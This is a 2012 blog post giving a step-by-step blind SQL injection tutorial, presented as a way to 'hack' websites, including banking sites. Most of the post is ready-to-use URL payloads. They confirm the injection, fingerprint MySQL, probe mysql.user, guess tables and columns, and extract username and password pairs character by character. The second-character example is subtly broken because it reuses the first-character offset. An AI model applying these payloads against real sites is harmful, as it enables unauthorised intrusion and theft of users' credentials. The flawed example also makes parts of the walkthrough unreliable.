Wednesday, 22 August 2012

Blind Sqli Tutorial To Hack A Website

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Blind Sqli is one of the most famous technique to hack a website..it is being used by many great hacker over the world to hack many banking websites as well as many popular websites.
Still today also millions of webs sites and vulnerable, can be turn down and credential information can be leaked using this "Blind Sqli" ...

Here is the complete step by step tutorial


Before going into it lets understand what is Blind Sqli?

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.Mean to say The page with the vulnerability may not be one that displays data but will display differently depending on the logical statement injected. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

The steps Begins here:
Suppose That You want to Hack This website with Blind Sqli for that you have to find such type of link shown below..

http://site.com/index.php?id=5


when we execute this, we see some page and articles on that page, pictures
etc…

then when we want to test it for blind sql injection attack


http://www.site.com/index.php?id=5 and 1=1

this is always true and the page loads normally,that's ok.

now the real test
 
http://www.site.com/index.php?id=5 and 1=2

this is false

so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring i.e

http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
when select don't work then we use subselect

i.e
http://www.site.com/index.php?id=5 and (select 1)=1

if page loads normally then subselects work.
then we gonna see if we have access to mysql.
user

i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can

pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend
i.e.

http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1

(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users
exits.

if you get FALSE (some article missing),
just change table name until you
guess the right one :)

let's say that we have found that table name is users,
now what we need is
column name.

the same as table name,
we start guessing. Like i said before try the
common names for columns.

i.e

http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1


if the page loads normally we know that column name is password (if we get
false then try common names or just guess)

here we merge 1 with the column password,
then substring returns the first
character (,1,1)


4). Pull data from database


we found table users i columns username password so we gonna pull
characters from that.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80


ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length.
ascii()

converts that 1 character into ascii value
and then compare it with simbol greater then ">" .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95


we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98


TRUE again, higher


http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!


so the first character in username is char(99). Using the ascii converter

we know that char(99) is letter 'c'.
then let's check the second character.


http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99


Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it
returns the second character, 1 character in lenght)

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!


we know that the second character is char(105) and that is 'i'. We have
'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).

Thankz For Reading

Keep Visiting :- www.indicyborg.blogspot.in

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